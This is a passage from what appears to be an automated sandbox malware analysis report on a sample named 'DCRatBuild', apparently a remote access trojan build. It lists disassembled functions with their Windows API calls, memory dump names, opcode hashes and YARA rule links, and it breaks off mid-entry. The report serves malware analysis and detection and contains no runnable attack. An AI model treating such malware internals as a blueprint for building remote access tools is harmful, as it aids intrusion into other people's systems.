                                        • Opcode Fuzzy Hash: 9f3ce6bdc7700172099b08cb0ae371da2b19dd02cdf9d2685a1a8bf4cd8017f2
                                        • Instruction Fuzzy Hash: 9821D371268246ABE714DE24C896AABBBE4AF95704F04481CF9D187142D36DEE0CDBA1
                                        Function 0075A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0075A4B8
                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0075A4C5
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressProc__crt_fast_encode_pointer
                                        • String ID:
                                        • API String ID: 2279764990-0
                                        • Opcode ID: d52721de03346d2c83408783fa2996794e2d402e15b6103daa3a430cbb94a376
                                        • Instruction ID: e70ba8ad61530524b9ac1f4f2cc45fbd311c00ce6826e16eeb9d05d974eb0d18
                                        • Opcode Fuzzy Hash: d52721de03346d2c83408783fa2996794e2d402e15b6103daa3a430cbb94a376
                                        • Instruction Fuzzy Hash: A2110A37A01261AB9F219EACEC448EA73A59B813217168330FD15AB254DAFCDC45C6E2
                                        Function 00739B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00739B35,?,?,00000000,?,?,00738D9C,?), ref: 00739BC0
                                        • GetLastError.KERNEL32 ref: 00739BCD
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: fb26c2ec641b019eab09f1553726d57a4ff9024559d8a568c9a6bb8cdfd1495b
                                        • Instruction ID: b919a6a529508186dea460bd5aeb826476b974343511e741d0f55432409680fa
                                        • Opcode Fuzzy Hash: fb26c2ec641b019eab09f1553726d57a4ff9024559d8a568c9a6bb8cdfd1495b
                                        • Instruction Fuzzy Hash: E20104B2304305DFAB08CE25AC9487EF399AFC1321F10852DFA1387282CAB8DC059A20
                                        Function 00739E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00739E76
                                        • GetLastError.KERNEL32 ref: 00739E82
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 364e8e82aaa36351d41b3f8350a3f0b2ab64609d6e9af071942e8284991bf695
                                        • Instruction ID: a9280d828b052c95f59328c8f873827f0726dd2197753d34302046ae28f61a02
                                        • Opcode Fuzzy Hash: 364e8e82aaa36351d41b3f8350a3f0b2ab64609d6e9af071942e8284991bf695
                                        • Instruction Fuzzy Hash: 520192737043006BFB34DE69DC4876BB6D99B84314F14893EF246C2681DAB9DC488610
                                        Function 00758606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00758627
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00770F50,0073CE57,?,?,?,?,?,?), ref: 00758663
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: ef75d5c690e9677b7c5d72f3f4888350b50f95fca69baa2d55074c2f3f836441
                                        • Instruction ID: fe69648d23952aec9eedc9042ec7169c41b3b77c353f2a50d6d972aad59b5c76
                                        • Opcode Fuzzy Hash: ef75d5c690e9677b7c5d72f3f4888350b50f95fca69baa2d55074c2f3f836441
                                        • Instruction Fuzzy Hash: 9BF0A421501116A7CBE12A21AC04AEF2758DF917A3B188115FC5476192DFECC8099597
                                        Function 00740908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00740915
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 0074091C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: e6af6cc9862f52773e73c6b915b93a49434e939770c60ed6edd95baa43c6e81c
                                        • Instruction ID: 434f8eb52b6be61196a3dd9cb5c7ebfb27114403a33f7a8280c53cc48ebd4f54
                                        • Opcode Fuzzy Hash: e6af6cc9862f52773e73c6b915b93a49434e939770c60ed6edd95baa43c6e81c
                                        • Instruction Fuzzy Hash: 6CE09232E14209ABEF09CAA49C049BB739DEB08214720817DEA07D3201FB38FE0586E4
                                        Function 0073A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A458
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A489
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 89504549d8606f26136202ef62f1b672ddd7562c17cf75c51d156085fd345930
                                        • Instruction ID: 3ba53b608e50f3a28ad6c0283a16c96aa283ebfa2ef9659d993995b2f3cc087b
                                        • Opcode Fuzzy Hash: 89504549d8606f26136202ef62f1b672ddd7562c17cf75c51d156085fd345930
                                        • Instruction Fuzzy Hash: CBF0A03124024DBBEF125F60DC06FD9376DBB04391F048055FC8886162DBBA8AA8EA50
                                        Function 0074D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText_swprintf
                                        • String ID:
                                        • API String ID: 3011073432-0
                                        • Opcode ID: def33ca6269342a0490138656fa09c832d86b96d5a46e0704c6b9a512af8802d
                                        • Instruction ID: 18fba73bf82d22b325c3389f610e8972fe463a88c95092c5ecf3fa3de487175b
                                        • Opcode Fuzzy Hash: def33ca6269342a0490138656fa09c832d86b96d5a46e0704c6b9a512af8802d
                                        • Instruction Fuzzy Hash: 46F0EC7164034CBAEB21AF70DC0EF99375CEB04745F040696B604530A2DF7D6E704762
                                        Function 0073A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,?,0073984C,?,?,00739688,?,?,?,?,00761FA1,000000FF), ref: 0073A13E
                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0073984C,?,?,00739688,?,?,?,?,00761FA1,000000FF), ref: 0073A16C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 35ae3c6229f934ba649aa756a44865863b6e123df1fc385683eabb040005e8fc
                                        • Instruction ID: c4ae12c6abdcba8251a3804b83c3269621c6e9bbe7795b121af40d133588081b
                                        • Opcode Fuzzy Hash: 35ae3c6229f934ba649aa756a44865863b6e123df1fc385683eabb040005e8fc
                                        • Instruction Fuzzy Hash: 80E0923564020CBBEB119F70DC46FE9776CBB09381F484065B988C3062DB669D98EA94
                                        Function 0074A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00761FA1,000000FF), ref: 0074A3D1
                                        • CoUninitialize.COMBASE(?,?,?,?,00761FA1,000000FF), ref: 0074A3D6
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: 373e85087c8eb3c428c0c247c2e427c67bf2822fa4c5343a2c56e667f93c27ce
                                        • Instruction ID: a6b4980b502405fbd0c1476a454dda9cce462ae4f23c08390e47b6ba453d3a4a
                                        • Opcode Fuzzy Hash: 373e85087c8eb3c428c0c247c2e427c67bf2822fa4c5343a2c56e667f93c27ce
                                        • Instruction Fuzzy Hash: 07F03072558A54EFC710AB4CDC09B55FBACFB49B20F04836AF41993B60CB786811CA95
                                        Function 0073A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,0073A189,?,007376B2,?,?,?,?), ref: 0073A1A5
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0073A189,?,007376B2,?,?,?,?), ref: 0073A1D1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 620745e15bd8317f48770e4670cd774bf65f82cc21507812db67877af2d815f7
                                        • Instruction ID: bbca637d643354c66167b05add106cb947df734513eda975f884038f1daa9826
                                        • Opcode Fuzzy Hash: 620745e15bd8317f48770e4670cd774bf65f82cc21507812db67877af2d815f7
                                        • Instruction Fuzzy Hash: 3EE09B3690011CA7DB21AB64DC05BE5776CAB083F1F004162FD45D3191D7749D449AD0
                                        Function 00740085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        • Opcode ID: f4dde491d46731541cae6abdba2406609a74d633ad67ee018252aab8d273a4cf
                                        • Instruction ID: ebc7ec87a30497a35b2cae523c51c8816d94ce17b0c950a7ff70384ddd78fb45
                                        • Opcode Fuzzy Hash: f4dde491d46731541cae6abdba2406609a74d633ad67ee018252aab8d273a4cf
                                        • Instruction Fuzzy Hash: 91E0927690021CAADB219BA49C08FD6776CFF0C392F0400A5BA08D3005DBB89A44CBF4
                                        Function 00749B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00749B30
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00749B37
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: b59376c2716ac5b5b1d6c3c3854d23b616723ca5b28d1e8688ce0e7fa0eab3cd
                                        • Instruction ID: 285e8b5fec235e1a0d0bb488204d483fef0f20d66df966f5d3963d752a3443ea
                                        • Opcode Fuzzy Hash: b59376c2716ac5b5b1d6c3c3854d23b616723ca5b28d1e8688ce0e7fa0eab3cd
                                        • Instruction Fuzzy Hash: B4E0ED71901218EBCB20DF98D50569AB7E8FB05321F10805BEC9593600D7B56E14DB91
                                        Function 0075215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075329A: try_get_function.LIBVCRUNTIME ref: 007532AF
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0075217A
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00752185
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                        • String ID:
                                        • API String ID: 806969131-0
                                        • Opcode ID: c6a2cb015add8bae06494bd82af6a378c606b878eaa226cf4ddfbcc42091366a
                                        • Instruction ID: c3274e0effb948949c5c9ffc4594eb3dd96dede4c3d0dc37986b0ad180c5ed75
                                        • Opcode Fuzzy Hash: c6a2cb015add8bae06494bd82af6a378c606b878eaa226cf4ddfbcc42091366a
                                        • Instruction Fuzzy Hash: C0D0A765504B0AA43C4436B42C5A0DB13445853BB33E00645EE20850E3EEDD444F6022
                                        Function 0074DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DloadLock.DELAYIMP ref: 0074DC73
                                        • DloadProtectSection.DELAYIMP ref: 0074DC8F
                                          • Part of subcall function 0074DE67: DloadObtainSection.DELAYIMP ref: 0074DE77
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Dload$Section$LockObtainProtect
                                        • String ID:
                                        • API String ID: 731663317-0
                                        • Opcode ID: 1c0bd97043e8b8b80233283d442142e590f6116743c3a7dc911342c2e38aec4e
                                        • Instruction ID: fa9335c2e6bf181b28491575dbbdab4fbb74e6e061b9923a77fa1a7a74f5dd30
                                        • Opcode Fuzzy Hash: 1c0bd97043e8b8b80233283d442142e590f6116743c3a7dc911342c2e38aec4e
                                        • Instruction Fuzzy Hash: 83D0C9705102109EC631AB64998A79C2271B706744FA44643E186960A1EBEC4C91E6A9
                                        Function 007312E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        • Opcode ID: 8d61a9e2a15eb894b61c0b3d43ce8e4e403479cf1b8dbebcaae42118170f1033
                                        • Instruction ID: 18c45f119ea704af1506a5ab05e43d53522df2359a2650d39f8d2725ac32b62b
                                        • Opcode Fuzzy Hash: 8d61a9e2a15eb894b61c0b3d43ce8e4e403479cf1b8dbebcaae42118170f1033
                                        • Instruction Fuzzy Hash: 04C01232098608BECB012BB0DC09D2FBBA8ABA4212F05C90AB2A5C0061C23CC022DB59
                                        Function 007319A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 51b122f8bab45017fd27f769bce2b26750b1215f5475666c51610c53c64aa5e3
                                        • Instruction ID: 1643524255468f97b64a363deeed2a05f6891f9e930741fbcfb3935b974fd2e3
                                        • Opcode Fuzzy Hash: 51b122f8bab45017fd27f769bce2b26750b1215f5475666c51610c53c64aa5e3
                                        • Instruction Fuzzy Hash: 98C1B570A042549FFF15CF68C498BA97BA5EF06310F4884B9DC46DF287CB799944CB61
                                        Function 00733B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
